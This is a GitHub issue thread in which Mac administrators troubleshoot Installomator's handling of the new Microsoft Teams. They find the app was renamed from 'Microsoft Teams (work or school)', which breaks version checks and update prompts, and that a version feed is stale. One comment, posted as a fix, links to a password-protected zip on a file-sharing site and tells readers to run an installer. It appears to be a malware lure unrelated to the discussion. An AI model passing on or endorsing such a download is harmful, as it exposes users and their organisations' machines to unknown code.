### ISSUE TITLE
New Microsoft Teams is not completely shutting down to update

### ISSUE THREAD

**Issue by sean-enright** [Installomator/Installomator#1798]
The users keep receiving these prompts until they manually shut down Teams. then it finally completes. 

<img width="439" alt="Teams WebView Update Prompt" src="https://github.com/user-attachments/assets/9d7b5914-bc2d-481c-94c1-5e5b4791f3a8">
<img width="428" alt="Teams Update Prompt" src="https://github.com/user-attachments/assets/aac63c3d-246f-4dfa-9af9-c8a9c6d6d4e6">

Possibly a change in the New Teams, everything worked like a charm up until this past week.

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by PeterPlanlos** [comment]
also I observed that the update wants to install on every run. means the currentversion seems not readable or it searches for a wrong *app
Microsoft Teams (ork or school).app
currently its just 
Microsoft Teams.app

**Comment by PeterPlanlos** [comment]
In current release 
line 5924 
needs to be updated to:
name="Microsoft Teams"

from name="Microsoft Teams (work or school)"

please could someone fix this asap?

Thank you very much

**Comment by tully-systima** [comment]
Yeah I'm having the same problem... Had to make a manual interception and fix in my main installomator script to specifically set the itemName to "Microsoft Teams"

**Comment by tully-systima** [comment]
Script used:
`MDM/App-update/App normal Auto-install.sh`
Version: 10.6 

variables set:
`appPath="/Applications/Microsoft Teams.app"`
`installomatorOptions="BLOCKING_PROCESS_ACTION=ignore"`

Returned results:
```
2024-09-09 14:01:36 [LOG-BEGIN] microsoftteamsnew
/Applications/Microsoft Teams.app Found!
2024-09-09 14:01:48.018 mdfind[67373:8980884] [UserQueryParser] Loading keywords and predicates for locale "en_US"
2024-09-09 14:01:48.018 mdfind[67373:8980884] [UserQueryParser] Loading keywords and predicates for locale "en"
2024-09-09 14:01:48.217 mdfind[67373:8980884] Couldn't determine the mapping between prefab keywords and predicates.
2024-09-09 14:02:23.924 mdfind[67647:8983089] [UserQueryParser] Loading keywords and predicates for locale "en_US"
2024-09-09 14:02:23.924 mdfind[67647:8983089] [UserQueryParser] Loading keywords and predicates for locale "en"
2024-09-09 14:02:24.092 mdfind[67647:8983089] Couldn't determine the mapping between prefab keywords and predicates.
microsoftteamsnew succesfully installed.
2024-09-09 14:01:36 : REQ   : microsoftteamsnew : ################## Start Installomator v. 10.6, date 2024-08-30
2024-09-09 14:01:48 : WARN  : microsoftteamsnew : No previous app found
2024-09-09 14:01:48 : WARN  : microsoftteamsnew : could not find Microsoft Teams (work or school).app
2024-09-09 14:01:48 : REQ   : microsoftteamsnew : Downloading https://go.microsoft.com/fwlink/?linkid=2249065 to Microsoft Teams (work or school).pkg
2024-09-09 14:01:56 : REQ   : microsoftteamsnew : Installing Microsoft Teams (work or school)
2024-09-09 14:02:24 : WARN  : microsoftteamsnew : No previous app found
2024-09-09 14:02:24 : WARN  : microsoftteamsnew : could not find Microsoft Teams (work or school).app
2024-09-09 14:02:24 : REQ   : microsoftteamsnew : Installed Microsoft Teams (work or school), version 23306.3408.2576.5406
2024-09-09 14:02:25 : REQ   : microsoftteamsnew : All done!
2024-09-09 14:02:25 : REQ   : microsoftteamsnew : ################## End Installomator, exit code 0
[Mon  9 Sep 2024 14:02:25 AEST][LOG-END]
```

Notice how the returned results prior to line 7 state `microsoftteamsnew succesfully installed`
I'm assuming that this is the `msupdate` tool logs being returned here, and `msupdate` has correctly identified and installed the update for `TEAMS21`

However, after `msupdate` has done its thing, then the installomator script starts, states `WARN  : microsoftteamsnew : No previous app found`, as the installomator script is now looking for `Microsoft Teams (work or school).app`. I would also posit that if the msupdate tool has correctly run any available updates for the label stated, then it should not then need to run the installomator script segment at all. 

I am working on a fix for this fragment that will only run the installomator section of the script if msupdate is either not present or not working correctly, unfortunately Microsoft do not list the Teams2 versioning information on a git, its only listed on a Microsoft help page that has to be manually updated by hand.

Additionally, I believe that we may need to move away from using the [macadmins.software](https://macadmins.software/latest.xml) xml file, I was that the person who was updating this is no longer able to keep it updated due to some personal issues, but that was sourceless 3rd hand information and may have been speculative. The most recent update to that file was in December 2023.

**Comment by csfjeff** [comment]
We're seeing these issues as well - 3 separate but related issues best I can tell:
- MS Teams has been renamed form Microsoft Teams (work or school) to just Microsoft Teams (easy fix).
- Because of the wrong name the logic for quitting and restarting the processes is broken.
- It's seeing an older version as the newest version, probably due to the macadmins.software xml file issue noted above.
I've tweaked a custom version of installomater changing the name and that seems to be running ok in spite of the logs noting the newest version is older than the installed version.

**Comment by JJSaysNay** [comment]
This is still an issue in the newest version.
